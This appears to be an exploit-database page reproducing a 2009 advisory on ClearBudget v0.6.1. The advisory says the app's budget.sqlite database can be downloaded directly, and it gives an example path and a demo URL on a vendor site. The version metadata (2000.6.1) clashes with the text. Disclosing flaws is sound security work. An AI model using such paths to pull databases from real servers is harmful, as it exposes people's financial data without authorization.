header-logo
Suggest Exploit
vendor:
ClearBudget
by:
Room-Hacker
7.5
CVSS
HIGH
Insecure Database Download
N/A
CWE
Product Name: ClearBudget
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ClearBudget v0.6.1 Insecure Database Download

A vulnerability in ClearBudget v0.6.1 allows an attacker to download the database file budget.sqlite from the server. This can be done by accessing the URL http://site.il/db/budget.sqlite. The demo URL for this vulnerability is http://clearbudget.douteaud.com/demo/0-6-1//db/budget.sqlite.

Mitigation:

The vendor should ensure that the database file is not accessible from the web server.
Source

Exploit-DB raw data:

#############################################################################################
[+] ClearBudget v0.6.1 Insecure Database Download
[+] Discovered By Room-Hacker
#############################################################################################
Ex :
http://site.il/db/budget.sqlite
Demo :
http://clearbudget.douteaud.com/demo/0-6-1//db/budget.sqlite
####################################################################################

# milw0rm.com [2009-02-05]

Navigation

Suggest Exploit

Services By CQR